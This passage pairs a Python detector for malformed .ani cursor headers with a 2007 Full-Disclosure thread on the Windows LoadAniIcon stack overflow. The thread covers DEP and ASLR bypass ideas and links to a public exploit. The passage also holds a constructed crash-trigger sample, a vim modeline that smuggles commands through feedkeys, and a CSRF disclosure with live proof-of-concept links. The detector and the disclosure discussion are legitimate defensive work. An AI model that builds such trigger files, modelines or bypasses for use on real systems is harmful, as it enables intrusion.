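            yield fourcc, size, payload, True
            return
        yield fourcc, size, payload, False
        if fourcc == b"LIST" and size >= 4:
            yield from riff_chunks(data, payload + 4, payload + size)
        offset = payload + size + (size & 1)  # RIFF pads odd-sized chunks to an even length


def scan_ani(data):
    """Return a list of findings for one .ani file; an empty list means nothing suspicious."""
    if len(data) < 12 or data[:4] != b"RIFF" or data[8:12] != b"ACON":
        return ["not a RIFF/ACON file"]
    riff_size = struct.unpack_from("<I", data, 4)[0]
    end = min(len(data), 8 + riff_size)  # never trust the RIFF size past the real file end
    findings = []
    for fourcc, size, payload, truncated in riff_chunks(data, 12, end):
        if fourcc == b"anih":
            if size != ANIH_EXPECTED:
                findings.append(f"anih chunk at offset {payload - 8} declares {size} bytes "
                                f"(expected {ANIH_EXPECTED})")
            elif not truncated and struct.unpack_from("<I", data, payload)[0] != ANIH_EXPECTED:
                findings.append(f"anih chunk at offset {payload - 8} has cbSize != {ANIH_EXPECTED}")
        if truncated:
            findings.append(f"{fourcc!r} chunk at offset {payload - 8} declares {size} bytes "
                            f"but only {end - payload} remain")
    return findings


# --- constructed samples (built here, not files from the thread) ---------------------------

def _chunk(fourcc, payload):
    pad = b"\0" if len(payload) & 1 else b""
    return fourcc + struct.pack("<I", len(payload)) + payload + pad


def _ani_file(chunks):
    body = b"ACON" + b"".join(chunks)
    return b"RIFF" + struct.pack("<I", len(body)) + body


ANIH_OK = struct.pack("<9I", 36, 1, 1, 0, 0, 0, 0, 16, 1)

# A well-formed one-frame cursor: correct anih, then a LIST/fram container with one icon chunk.
BENIGN = _ani_file([_chunk(b"anih", ANIH_OK),
                    _chunk(b"LIST", b"fram" + _chunk(b"icon", b"\0" * 16))])

# Same chunk layout as the header quoted in the thread: a valid first anih, two filler
# 'TSIL' chunks, then a second anih that declares 0x3A8 = 936 bytes. Total length is 1024.
MALFORMED = _ani_file([_chunk(b"anih", ANIH_OK),
                       _chunk(b"TSIL", b"\x10\0\0"),
                       _chunk(b"TSIL", b"\x02\x02\x02"),
                       _chunk(b"anih", b"\x90" * 0x3A8)])

if __name__ == "__main__":
    for name, sample in (("benign", BENIGN), ("malformed", MALFORMED)):
        print(name, scan_ani(sample) or "clean")
```

Pointed at a directory of .ani and .cur files pulled from a mail gateway or web proxy, an empty list per file means the header checks passed; the same rule works as a content-filter signature because it depends only on chunk lengths, not on any particular payload.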
From jammer128 at gmail.com Sun Apr 1 16:57:17 2007
From: jammer128 at gmail.com (Jason Miller)
Date: Sun, 1 Apr 2007 10:57:17 -0500
Subject: [Full-disclosure] April 1 joke
In-Reply-To: <969102.78862.qm@web63807.mail.re1.yahoo.com>
References: <969102.78862.qm@web63807.mail.re1.yahoo.com>
Message-ID: <829b2de40704010857r36039546hf768297bec5e5612@mail.gmail.com>

too bad i don't get it.

On 4/1/07, V Comics wrote:
> vim:
> foldmethod=expr:foldexpr=feedkeys("\\\\x3a%!cat\\x20-n\\\\\\x
> 3a%s/./\:)/g\\\\\\x3aq!\\"):
>
> a
>

From waldoalvarez00 at gmail.com Sun Apr 1 17:13:53 2007
From: waldoalvarez00 at gmail.com (wac)
Date: Sun, 1 Apr 2007 12:13:53 -0400
Subject: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow
In-Reply-To: <0273B67044957C41BD71D12EBA2E00AE0FD30D@becca.LarrySeltzer.local>
References: <8a6b8e350703312058i1b7470fbp708639d246d27bda@mail.gmail.com> <0273B67044957C41BD71D12EBA2E00AE0FD30D@becca.LarrySeltzer.local>
Message-ID:

On 4/1/07, Larry Seltzer wrote:
>
> >>The issue is that this only works with DEP turned off!
>
> Interesting point. I haven't seen this mentioned anywhere, including the
> Microsoft advisory
> (http://www.microsoft.com/technet/security/advisory/935423.mspx).
>
> Has anyone actually tested this with DEP on/off to be sure?
Yes, winhex uses the function when you open the .ani and I don't have it running with DEP turned on and the same goes for firefox that also leaves the file opened when I opened the web link dev sent me (already tested winhex with the address of exitprocess that btw seems to float around from system to system since the version dev sent me does not work for me and it works like a charm when I built it). I was talking with dev code about DEP bypassing btw, we think that is possible to exploit even with >> DEP ON <<. Just ideas for now.

> Larry Seltzer
> eWEEK.com Security Center Editor
> http://security.eweek.com/
> http://blog.eweek.com/blogs/larry_seltzer/
> Contributing Editor, PC Magazine
> larryseltzer at ziffdavis.com
>

From kf_lists at digitalmunition.com Sun Apr 1 17:25:32 2007
From: kf_lists at digitalmunition.com (Kevin Finisterre (lists))
Date: Sun, 1 Apr 2007 12:25:32 -0400
Subject: [Full-disclosure] Busting The Bluetooth Myth
In-Reply-To:
References:
Message-ID: <199F4FE0-B9F8-49A7-9388-F0223B142C70@digitalmunition.com>

Giorgio if anything he is blowing the whistle on the vendors that charge a metric shit ton for a piece of hardware that is not necessary.
-KF

On Apr 1, 2007, at 11:17 AM, Giorgio Fedon wrote:

> | Hi,
> |
> | You missed the point completely. He's not promoting software
> piracy but
> | showing that the high-dollar bluetooth sniffers are not required
> and that
> | your average dongle can do everything that a proprietary
> product can.
>
> The "thinly veiled advert" was to mention that either:
>
> 1. He is using a pirated version of the bluetooth sniffer;
> 2. He has downloaded a pirated version of the bluetooth sniffer and
> printed a pdf of the readme inside;
> 3. He is the author of the pirated version of the bluetooth sniffer.
>

From cslyon at gmail.com Sun Apr 1 17:24:51 2007
From: cslyon at gmail.com (Chris Lyon)
Date: Sun, 1 Apr 2007 09:24:51 -0700
Subject: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow
In-Reply-To:
References: <8a6b8e350703312058i1b7470fbp708639d246d27bda@mail.gmail.com> <0273B67044957C41BD71D12EBA2E00AE0FD30D@becca.LarrySeltzer.local>
Message-ID:

On 4/1/07, wac wrote:
>
>
> On 4/1/07, Larry Seltzer wrote:
> >
> > >>The issue is that this only works with DEP turned off!
> >
> > Interesting point. I haven't seen this mentioned anywhere, including the
> > Microsoft advisory
> > ( http://www.microsoft.com/technet/security/advisory/935423.mspx).
> >
> > Has anyone actually tested this with DEP on/off to be sure?
>

Did you guys see this from the CISRT.

http://www.cisrt.org/enblog/read.php?68

> Yes, winhex uses the function when you open the .ani and I don't have it
> running with DEP turned on and the same goes for firefox that also leaves
> the file opened when I opened the web link dev sent me (already tested winhex
> with the address of exitprocess that btw seems to float around from system
> to system since the version dev sent me does not work for me and it works
> like a charm when I built it). I was talking with dev code about DEP
> bypassing btw, we think that is possible to exploit even with >> DEP ON <<.
> Just ideas for now.
>
> > Larry Seltzer
> > eWEEK.com Security Center Editor
> > http://security.eweek.com/
> > http://blog.eweek.com/blogs/larry_seltzer/
> > Contributing Editor, PC Magazine
> > larryseltzer at ziffdavis.com
> >
>

From edcarp at gmail.com Sun Apr 1 17:08:48 2007
From: edcarp at gmail.com (Ed Carp)
Date: Sun, 1 Apr 2007 09:08:48 -0700
Subject: [Full-disclosure] Busting The Bluetooth Myth
In-Reply-To:
References:
Message-ID: <1b0d006c0704010908r12fc0d82l74679879d4985fff@mail.gmail.com>

On 4/1/07, Giorgio Fedon wrote:
> 3. He is the author of the pirated version of the bluetooth sniffer.

Isn't that a logical impossibility? If he's the author, it can't be pirated, now can it?

From giorgio.fedon at gmail.com Sun Apr 1 17:37:48 2007
From: giorgio.fedon at gmail.com (Giorgio Fedon)
Date: Sun, 1 Apr 2007 18:37:48 +0200
Subject: [Full-disclosure] Busting The Bluetooth Myth
In-Reply-To: <199F4FE0-B9F8-49A7-9388-F0223B142C70@digitalmunition.com>
References: <199F4FE0-B9F8-49A7-9388-F0223B142C70@digitalmunition.com>
Message-ID:

Hi Kevin,

I could understand that vendors are charging simple CSR dongles (19 dollars??) up to thousands of dollars. But the way to publish a paper making a direct reference (if someone is aware about the underlying piece of software he is talking about) to a particular vendor is not so cute. Maybe they have written their firmware.
Worse is to sustain the fact that the world needs a better bluetooth sniffer, using the information that can be found inside the warezed version of the tool. The opensource community, I think, is able to do its own research without software piracy.

2007/4/1, Kevin Finisterre (lists) :
>
> Giorgio if anything he is blowing the whistle on the vendors that
> charge a metric shit ton for a piece of hardware that is not necessary.
> -KF
>

From Thierry at Zoller.lu Sun Apr 1 18:07:06 2007
From: Thierry at Zoller.lu (Thierry Zoller)
Date: Sun, 1 Apr 2007 19:07:06 +0200
Subject: [Full-disclosure] Busting The Bluetooth Myth
In-Reply-To:
References:
Message-ID: <1762752538.20070401190706@Zoller.lu>

From hdw at kallisti.se Sun Apr 1 18:13:56 2007
From: hdw at kallisti.se (Anders B Jansson)
Date: Sun, 01 Apr 2007 19:13:56 +0200
Subject: [Full-disclosure] Busting The Bluetooth Myth
In-Reply-To:
References: <199F4FE0-B9F8-49A7-9388-F0223B142C70@digitalmunition.com>
Message-ID: <460FE854.7080502@kallisti.se>

Giorgio Fedon wrote:
> Worse is to sustain the fact that the world needs a better bluetooth
> sniffer, using the information that can be found inside the warezed
> version of the tool. The opensource community, I think, is able to do
> its own research without software piracy.

If the information is within the 'warezed' version, then it's also within 'the non-warezed' one.

Using available distributed information to write software isn't piracy.

Taking someone's written software and distributing it as your own and under your own terms most certainly is.
But building on someone's idea and distributed information to write a different tool (smaller, bigger, better, worse, cheaper, what ever) isn't.

--
// hdw

From hdw at kallisti.se Sun Apr 1 18:01:34 2007
From: hdw at kallisti.se (Anders B Jansson)
Date: Sun, 01 Apr 2007 19:01:34 +0200
Subject: [Full-disclosure] Busting The Bluetooth Myth
In-Reply-To:
References:
Message-ID: <460FE56E.8010603@kallisti.se>

Giorgio Fedon wrote:
> The "thinly veiled advert" was to mention that either:
>
> 1. He is using a pirated version of the bluetooth sniffer;
> 2. He has downloaded a pirated version of the bluetooth sniffer and
> printed a pdf of the readme inside;
> 3. He is the author of the pirated version of the bluetooth sniffer.

Erh?

Are we talking of pirate as in "stealing our holy IP", where 'IP' as in using j.random BT as a BT sniffer or 'IP' as in the words "bluetooth sniffer"?

As far as I can understand the statement it was frikken obvious.

You _can_ use j.random BT dongle _if_ you have the required software.

Well 'doh!', of course you can. But you need a piece of software that can do that.

The use of the phrase "the bluetooth sniffer" got me wondering.

Do you really think that there's only one single software that can do this?

It's like stating that there's one software to capture audio from a microphone and that all other audiorecorders are 'pirated software'. Or a network device? A firewire device? A USB device?

Sniffers are essential tools, if available they'll be used. If not available, they'll be created, if available but bad, broken or too expensive they'll be recreated.
--
// hdw

From giorgio.fedon at gmail.com Sun Apr 1 19:15:05 2007
From: giorgio.fedon at gmail.com (Giorgio Fedon)
Date: Sun, 1 Apr 2007 20:15:05 +0200
Subject: [Full-disclosure] Busting The Bluetooth Myth
In-Reply-To: <460FE854.7080502@kallisti.se>
References: <199F4FE0-B9F8-49A7-9388-F0223B142C70@digitalmunition.com> <460FE854.7080502@kallisti.se>
Message-ID:

----------------- To Thierry:

> Oh, dear, here is my "thinly veiled advert" for you :
> - You can potentially be sued for this (I would sue you,
> see you are slandering a consultant here that gets jobs based
> on his reputation)

First of all I haven't said anything that could not be rebutted. So I am not slandering anyone. I just said what I'm thinking at the moment; maybe Max Moser can make me change my mind.

> you refer to ? I have read the paper and found none, where did you ?

The software is described in detail inside the paper. Dongle activation, .ini files and .dcu files. This seems to run on Windows. I know only one software like this one (Maybe you are using it as well).

> Where is he promoting Software Piracy ? I have read the paper and found none, where did you ?

That software is based upon a dongle (USB Bluetooth in this case). If you can clone the dongle, you could be able to easily clone the software.

> First, I knew nothing about such a "release" until YOU posted information about the name
> of a (what apparently is) a Warez group

I'm sorry this was my mistake, but there wasn't any direct link to the release. Anyway I found this stuff after I have read the .pdf document. At first I have found the vendor then I have searched in google "Vendor + CSR dongle" and I found that.

> Second, you apparently assume the Warez group is the same person that wrote the paper, which is
> a very ignorant assumption to make, not to mention a dangerous one.

I never told this.

> The opensource community I think that is able to do its own research without software piracy.
Read it as not forcing (or partially forcing) the protection of commercial software.

----------------- To Anders:

I agree with you

From nytrokiss at gmail.com Sun Apr 1 19:40:11 2007
From: nytrokiss at gmail.com (James Matthews)
Date: Sun, 1 Apr 2007 11:40:11 -0700
Subject: [Full-disclosure] April 1 joke
In-Reply-To: <829b2de40704010857r36039546hf768297bec5e5612@mail.gmail.com>
References: <969102.78862.qm@web63807.mail.re1.yahoo.com> <829b2de40704010857r36039546hf768297bec5e5612@mail.gmail.com>
Message-ID: <8a6b8e350704011140w429d3a8cn4d767726e6f571b@mail.gmail.com>

punch it in vi

On 4/1/07, Jason Miller wrote:
>
> too bad i don't get it.
>
> On 4/1/07, V Comics wrote:
> > vim:
> >
> foldmethod=expr:foldexpr=feedkeys("\\\\x3a%!cat\\x20-n\\\\\\x
> > 3a%s/./\:)/g\\\\\\x3aq!\\"):
> >
> > a
> >
>

--
http://www.goldwatches.com/watches.asp?Brand=39
http://www.wazoozle.com
From kf_lists at digitalmunition.com Sun Apr 1 19:43:27 2007
From: kf_lists at digitalmunition.com (Kevin Finisterre (lists))
Date: Sun, 1 Apr 2007 14:43:27 -0400
Subject: [Full-disclosure] Busting The Bluetooth Myth
In-Reply-To:
References: <199F4FE0-B9F8-49A7-9388-F0223B142C70@digitalmunition.com> <460FE854.7080502@kallisti.se>
Message-ID:

Anyone wanna buy a used BPA100? =]
-KF

On Apr 1, 2007, at 2:15 PM, Giorgio Fedon wrote:

> ----------------- To Thierry:
>
> > Oh, dear, here is my "thinly veiled advert" for you :
>
> > - You can potentially be sued for this (I would sue you,
> > see you are slandering a consultant here that gets jobs based
> > on his reputation)
>
> First of all I haven't said anything that could not be rebutted.
> So I am not slandering anyone. I just said what I'm thinking at the
> moment;
> maybe Max Moser can make me change my mind.
>
> > you refer to ? I have read the paper and found none, where did you ?
>
> The software is described in detail inside the paper.
> Dongle activation, .ini files and .dcu files. This seems to run on
> Windows. I know only one software like this one (Maybe you are
> using it as well).
>
> > Where is he promoting Software Piracy ? I have read the paper
> and found none, where did you ?
>
> That software is based upon a dongle (USB Bluetooth in this case).
> If you can clone the dongle, you could be able to easily clone the
> software.
>
> > First, I knew nothing about such a "release" until YOU posted
> information about the name
> > of a (what apparently is) a Warez group
>
> I'm sorry this was my mistake, but there wasn't any direct link to
> the release.
> Anyway I found this stuff after I have read the .pdf document. At
> first I have found the vendor
> then I have searched in google "Vendor + CSR dongle" and I found that.
>
> > Second, you apparently assume the Warez group is the same person
> that wrote the paper, which is
> > a very ignorant assumption to make, not to mention a dangerous one.
>
> I never told this.
>
> > The opensource community I think that is able to do its own
> research without software piracy.
>
> Read it as not forcing (or partially forcing) the protection of
> commercial software.
>
>
> ----------------- To Anders:
>
> I agree with you
>

From callax at goodfellas.shellcode.com.ar Sun Apr 1 17:37:18 2007
From: callax at goodfellas.shellcode.com.ar (Goodfellas Research Security Team - Callax)
Date: Sun, 1 Apr 2007 18:37:18 +0200
Subject: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow
In-Reply-To: <0273B67044957C41BD71D12EBA2E00AE0FD30D@becca.LarrySeltzer.local>
Message-ID: <20070401163438.5D9F5E80DD@mail.shellcode.com.ar>

Hi,

I tested it in Windows xp sp2 and it doesn't work.

Greetings
Callax
Shellcode Security Research Team.
Argentine

-----Original Message-----
From: full-disclosure-bounces at lists.grok.org.uk [mailto:full-disclosure-bounces at lists.grok.org.uk] On behalf of Larry Seltzer
Sent: Sunday, 01 April 2007 01:50 p.m.
To: full-disclosure at lists.grok.org.uk
Subject: Re: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow

>>The issue is that this only works with DEP turned off!

Interesting point. I haven't seen this mentioned anywhere, including the Microsoft advisory (http://www.microsoft.com/technet/security/advisory/935423.mspx).

Has anyone actually tested this with DEP on/off to be sure?
Larry Seltzer
eWEEK.com Security Center Editor
http://security.eweek.com/
http://blog.eweek.com/blogs/larry_seltzer/
Contributing Editor, PC Magazine
larryseltzer at ziffdavis.com

From Larry at larryseltzer.com Sun Apr 1 20:10:28 2007
From: Larry at larryseltzer.com (Larry Seltzer)
Date: Sun, 1 Apr 2007 15:10:28 -0400
Subject: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow
In-Reply-To: <20070401163438.5D9F5E80DD@mail.shellcode.com.ar>
References: <0273B67044957C41BD71D12EBA2E00AE0FD30D@becca.LarrySeltzer.local> <20070401163438.5D9F5E80DD@mail.shellcode.com.ar>
Message-ID: <0273B67044957C41BD71D12EBA2E00AE0FD30F@becca.LarrySeltzer.local>

>>I tested it in Windows xp sp2 and it doesn't work.
>>Callax

Did you try turning DEP off and re-testing?

Larry Seltzer
eWEEK.com Security Center Editor
http://security.eweek.com/
http://blog.eweek.com/blogs/larry%5Fseltzer/
Contributing Editor, PC Magazine
larryseltzer at ziffdavis.com

From Larry at larryseltzer.com Sun Apr 1 20:23:22 2007
From: Larry at larryseltzer.com (Larry Seltzer)
Date: Sun, 1 Apr 2007 15:23:22 -0400
Subject: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow
In-Reply-To:
References: <0273B67044957C41BD71D12EBA2E00AE0FD30D@becca.LarrySeltzer.local>
Message-ID: <0273B67044957C41BD71D12EBA2E00AE0FD314@becca.LarrySeltzer.local>

>>It is completely possible to execute shellcode if we can do some DEP bypass (ie. ret2libc attack, etc..)

In Vista this should have problems because of ASLR, right?

I'm beginning to think that web-based attacks with this in Vista aren't really so scary. Even if you can get them to execute what can you really do in IE protected mode? You need to get the user to run the ANI outside of IE.
Can anyone say what actually happens if you read an e-mail in the Vista Mail program with an attack ANI embedded?

Larry Seltzer
eWEEK.com Security Center Editor
http://security.eweek.com/
http://blog.eweek.com/blogs/larry%5Fseltzer/
Contributing Editor, PC Magazine
larryseltzer at ziffdavis.com

From mdranta at gmail.com Sun Apr 1 21:32:04 2007
From: mdranta at gmail.com (Matti Ranta)
Date: Sun, 1 Apr 2007 15:32:04 -0500
Subject: [Full-disclosure] April 1 joke
In-Reply-To: <8a6b8e350704011140w429d3a8cn4d767726e6f571b@mail.gmail.com>
References: <969102.78862.qm@web63807.mail.re1.yahoo.com> <829b2de40704010857r36039546hf768297bec5e5612@mail.gmail.com> <8a6b8e350704011140w429d3a8cn4d767726e6f571b@mail.gmail.com>
Message-ID: <2ab70b460704011332pad5ebb9hc929cfffdd11b4e7@mail.gmail.com>

I don't know how to use vi what do i do

On 4/1/07, James Matthews wrote:
> punch it in vi
>
>
> On 4/1/07, Jason Miller wrote:
> > too bad i don't get it.
> >
> > On 4/1/07, V Comics wrote:
> > > vim:
> > >
> foldmethod=expr:foldexpr=feedkeys("\\\\x3a%!cat\\x20-n\\\\\\x
> > > 3a%s/./\:)/g\\\\\\x3aq!\\"):
> > >
> > > a
> > >
> >
>
> --
> http://www.goldwatches.com/watches.asp?Brand=39
> http://www.wazoozle.com
>

--
Matti Ranta

From devcode29 at hotmail.com Sun Apr 1 22:21:43 2007
From: devcode29 at hotmail.com (dev code)
Date: Sun, 01 Apr 2007 21:21:43 +0000
Subject: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow
In-Reply-To:
Message-ID:

Just wanted to post that using a ret2libc attack works as shown in the video here:

http://www.zippyvideos.com/5991194746836606/ani-xp-sp2/

>From: "Chris Lyon"
>To: full-disclosure at lists.grok.org.uk
>Subject: Re: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow
>Date: Sun, 1 Apr 2007 09:24:51 -0700
>
>On 4/1/07, wac wrote:
>>
>>
>>On 4/1/07, Larry Seltzer wrote:
>> >
>> > >>The issue is that this only works with DEP turned off!
>> >
>> > Interesting point. I haven't seen this mentioned anywhere, including
>>the
>> > Microsoft advisory
>> > ( http://www.microsoft.com/technet/security/advisory/935423.mspx).
>> >
>> > Has anyone actually tested this with DEP on/off to be sure?
>>
>
>Did you guys see this from the CISRT.
>
>http://www.cisrt.org/enblog/read.php?68
>
>
>>Yes, winhex uses the function when you open the .ani and I don't have it
>>running with DEP turned on and the same goes for firefox that also leaves
>>the file opened when I opened the web link dev sent me (already tested
>>winhex
>>with the address of exitprocess that btw seems to float around from system
>>to system since the version dev sent me does not work for me and it works
>>like a charm when I built it).
>>I was talking with dev code about DEP
>>bypassing btw, we think that is possible to exploit even with >> DEP ON
>><<.
>>Just ideas for now.
>>
>>Larry Seltzer
>> > eWEEK.com Security Center Editor
>> > http://security.eweek.com/
>> > http://blog.eweek.com/blogs/larry_seltzer/
>> > Contributing Editor, PC Magazine
>> > larryseltzer at ziffdavis.com
>> >
>>

From Larry at larryseltzer.com Sun Apr 1 22:45:04 2007
From: Larry at larryseltzer.com (Larry Seltzer)
Date: Sun, 1 Apr 2007 17:45:04 -0400
Subject: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow
In-Reply-To: <46100B19.2040904@immunityinc.com>
References: <0273B67044957C41BD71D12EBA2E00AE0FD30D@becca.LarrySeltzer.local> <0273B67044957C41BD71D12EBA2E00AE0FD314@becca.LarrySeltzer.local> <46100B19.2040904@immunityinc.com>
Message-ID: <0273B67044957C41BD71D12EBA2E00AE0FD31B@becca.LarrySeltzer.local>

I'm not familiar with Solar Eclipse's claims. I thought the low-entropy argument was impeached a while ago.
See http://blogs.msdn.com/michael_howard/archive/2006/10/04/Alleged-Bugs-in-Windows-Vista_1920_s-ASLR-Implementation.aspx

The author of the original paper arguing low entropy replies to the blog conceding the point. There are two stages of randomization. Perhaps your exploit proves this wrong, but it's the last I heard on the subject.

And even if there are only 256 slots how do you try more than one? Isn't the first wrong one going to crash the browser?

As for the exploits in protected mode I'm sure there are things you can do, but it's a huge step down from what you can do in XP and it's gone as soon as you exit IE7.

Larry Seltzer
eWEEK.com Security Center Editor
http://security.eweek.com/
http://blog.eweek.com/blogs/larry%5Fseltzer/
Contributing Editor, PC Magazine
larryseltzer at ziffdavis.com

-----Original Message-----
From: Dave Aitel [mailto:dave at immunityinc.com]
Sent: Sunday, April 01, 2007 3:42 PM
To: Larry Seltzer
Cc: dev code; full-disclosure at lists.grok.org.uk
Subject: Re: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

ASLR has limited entropy and the attacker can continue to try exploits an infinite number of times (as Solar Eclipse points out). This means you can write a reliable Vista exploit, theoretically. I'll probably finish one up on Monday.

IE in protected mode would still allow you access to the local network and, more importantly, anything IE does. You could, for example, inject code into all viewed webpages that steals passwords and whatnot. Just at the very minimum.

- -dave

Larry Seltzer wrote:
>>> It is completely possible to execute shellcode if we can do some DEP
> bypass (ie. ret2libc attack, etc..)
>
> In Vista this should have problems because of ASLR, right?
>
> I'm beginning to think that web-based attacks with this in Vista
> aren't really so scary. Even if you can get them to execute what can
> you really do in IE protected mode?
> You need to get the user to run
> the ANI outside of IE. Can anyone say what actually happens if you
> read an e-mail in the Vista Mail program with an attack ANI embedded?
>
> Larry Seltzer
> eWEEK.com Security Center Editor
> http://security.eweek.com/
> http://blog.eweek.com/blogs/larry%5Fseltzer/
> Contributing Editor, PC Magazine
> larryseltzer at ziffdavis.com
>

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQFGEAsYtehAhL0gheoRAutoAJ0QhPsOvcdCTU2dZZgkZYINC3+K3QCdFMQH
UH02qnLi2Gbp07rLWpKv/5w=
=4oC5
-----END PGP SIGNATURE-----

From ad at heapoverflow.com Sun Apr 1 23:16:26 2007
From: ad at heapoverflow.com (ad at heapoverflow.com)
Date: Mon, 02 Apr 2007 00:16:26 +0200
Subject: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow
In-Reply-To: <0273B67044957C41BD71D12EBA2E00AE0FD314@becca.LarrySeltzer.local>
References: <0273B67044957C41BD71D12EBA2E00AE0FD30D@becca.LarrySeltzer.local> <0273B67044957C41BD71D12EBA2E00AE0FD314@becca.LarrySeltzer.local>
Message-ID: <46102F3A.8000908@heapoverflow.com>

From the published poc yes vista is vulnerable, the poc doesn't exploit it but shows enough..
The whole windows browser crashes when you try to open the folder of the malicious .ani file, can't even attach it to an email because thunderbird crashes when I'm browsing to attach the .ani, EIP is overwritten by some wrong data near the shellcode. To resume you don't have to open the file on vista, displaying it is enough, there is less user interaction required to exploit that bug on vista than older windows os,

surprising...

...or not =)

Larry Seltzer wrote:
>>> It is completely possible to execute shellcode if we can do some DEP
> bypass (ie. ret2libc attack, etc..)
>
> In Vista this should have problems because of ASLR, right?
>
> I'm beginning to think that web-based attacks with this in Vista aren't
> really so scary. Even if you can get them to execute what can you really
> do in IE protected mode? You need to get the user to run the ANI outside
> of IE. Can anyone say what actually happens if you read an e-mail in the
> Vista Mail program with an attack ANI embedded?
>
> Larry Seltzer
> eWEEK.com Security Center Editor
> http://security.eweek.com/
> http://blog.eweek.com/blogs/larry%5Fseltzer/
> Contributing Editor, PC Magazine
> larryseltzer at ziffdavis.com
>

From ad at heapoverflow.com Sun Apr 1 23:39:46 2007
From: ad at heapoverflow.com (ad at heapoverflow.com)
Date: Mon, 02 Apr 2007 00:39:46 +0200
Subject: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow
In-Reply-To: <46102F3A.8000908@heapoverflow.com>
References: <0273B67044957C41BD71D12EBA2E00AE0FD30D@becca.LarrySeltzer.local> <0273B67044957C41BD71D12EBA2E00AE0FD314@becca.LarrySeltzer.local> <46102F3A.8000908@heapoverflow.com>
Message-ID: <461034B2.6050502@heapoverflow.com>

http://www.milw0rm.com/exploits/3634

str0ke told me to test this one and no miracle, it works under vista and the default DEP settings doesn't catch it.

ad at heapoverflow.com wrote:
> From the published poc yes vista is vulnerable, the poc doesn't
> exploit it but shows enough..
> The whole windows browser crashes when you try to open the folder of the
> malicious .ani file,
> can't even attach it to an email because thunderbird crashes when I'm
> browsing to attach the .ani,
> EIP is overwritten by some wrong data near the shellcode. To resume
> you don't have to open the file
> on vista, displaying it is enough, there is less user interaction
> required to exploit that bug on vista than older windows os,
>
> surprising...
>
> ...or not =)
>
> Larry Seltzer wrote:
>
>>>> It is completely possible to execute shellcode if we can do some DEP
>> bypass (ie. ret2libc attack, etc..)
>>
>> In Vista this should have problems because of ASLR, right?
>>
>> I'm beginning to think that web-based attacks with this in Vista aren't
>> really so scary. Even if you can get them to execute what can you really
>> do in IE protected mode? You need to get the user to run the ANI outside
>> of IE. Can anyone say what actually happens if you read an e-mail in the
>> Vista Mail program with an attack ANI embedded?
>>
>> Larry Seltzer
>> eWEEK.com Security Center Editor
>> http://security.eweek.com/
>> http://blog.eweek.com/blogs/larry%5Fseltzer/
>> Contributing Editor, PC Magazine
>> larryseltzer at ziffdavis.com
>>
>

From rosario.valotta at gmail.com Mon Apr 2 01:31:45 2007
From: rosario.valotta at gmail.com (Rosario Valotta)
Date: Mon, 2 Apr 2007 02:31:45 +0200
Subject: [Full-disclosure] Severe CSRF vulnerabilities allow mail/msg spoofing in Libero.it portal
Message-ID:

<--start-->

Other severe vulnerabilities are present on the Libero.it (Italian ISP) portal, always in the Community section.

The portal allows users to create personal web pages with unchecked contents. These pages will be hosted under the digilander.libero.it domain, so that it is possible for an attacker to read and manipulate visitors' cookies (with obvious risks for privacy & phishing opportunities...). This is a conceptual mistake...
But this is just the beginning: an attacker can use his Libero personal site to conduct CSRF attacks against Community users; merely opening the malicious pages can result in:

1- attacker can send msgs to other community users from victim's account Ciao!
2- attacker can send e-mails to other community users using victim's account Ciao!
In both cases neither Referrer nor unique tokens are used to prevent CSRF.

POC (until deleted) can be found at:
http://digilander.libero.it/testxss/demo/img.htm
http://digilander.libero.it/testxss/demo/img2.htm

Both require that you're logged in to the Libero Community.

Greetings,
Rosario Valotta
rosario.valotta at gmail dot com

<---end-->

From george_ou at lanarchitect.net Mon Apr 2 01:38:29 2007
From: george_ou at lanarchitect.net (George Ou)
Date: Sun, 1 Apr 2007 17:38:29 -0700
Subject: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow
Message-ID: <000301c774bf$3cf4a4f0$b6ddeed0$@net>

"ad at heapoverflow.com said:
http://www.milw0rm.com/exploits/3634

str0ke told me to test this one and no miracle, it works under vista and the default DEP settings doesn't catch it."

Default DEP settings in Windows XP or Vista are worthless since it's off for all applications including IE7. I tested with DEP always-on and it crashed IE7 and the exploit failed.

Note that when you manually launch an HTML from your hard drive, Protected Mode is turned off because your HDD is considered a trusted source whereas the public Internet is not. If I had tried to browse a webpage with this exploit, protected mode would have been turned on. I also had to manually bypass the ActiveX warning to get the exploit to run and even then it crashed with my fully-on DEP settings with hardware enforcement.

I don't really feel like turning off my DEP settings on my Vista machine, though I have a feeling that UAC would prevent it from rooting my system, though it could probably damage my files if it were coded to do that. But I had to go out of my way to get this exploit to run by manually downloading the zip and manually enabling the ActiveX control just to get it to crash my browser.

So I think it's fair to say that hardware-enforced fully-enabled DEP will defeat the ANI exploit (in the current generic state) all by itself.
Protected Mode would have also mitigated the ANI exploit to a low-risk state that is non-persistent as soon as IE is closed.

So with protected mode turned off, DEP not fully enabled (or missing NX hardware), the ANI exploit would be able to compromise the local user profile and data but it would still need to get around UAC if it wants to put a backdoor in Vista.

George

From nytrokiss at gmail.com Mon Apr 2 02:45:21 2007
From: nytrokiss at gmail.com (James Matthews)
Date: Sun, 1 Apr 2007 18:45:21 -0700
Subject: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow
In-Reply-To: <000301c774bf$3cf4a4f0$b6ddeed0$@net>
References: <000301c774bf$3cf4a4f0$b6ddeed0$@net>
Message-ID: <8a6b8e350704011845oef7abb3sfe0499acd8bb8498@mail.gmail.com>

Windows security has always been pockmarked

On 4/1/07, George Ou wrote:
> "ad at heapoverflow.com said:
> http://www.milw0rm.com/exploits/3634

--
http://www.goldwatches.com/watches.asp?Brand=39
http://www.wazoozle.com

From dudevanwinkle at gmail.com Mon Apr 2 02:58:51 2007
From: dudevanwinkle at gmail.com (Dude VanWinkle)
Date: Sun, 1 Apr 2007 21:58:51 -0400
Subject: [Full-disclosure] April 1 joke
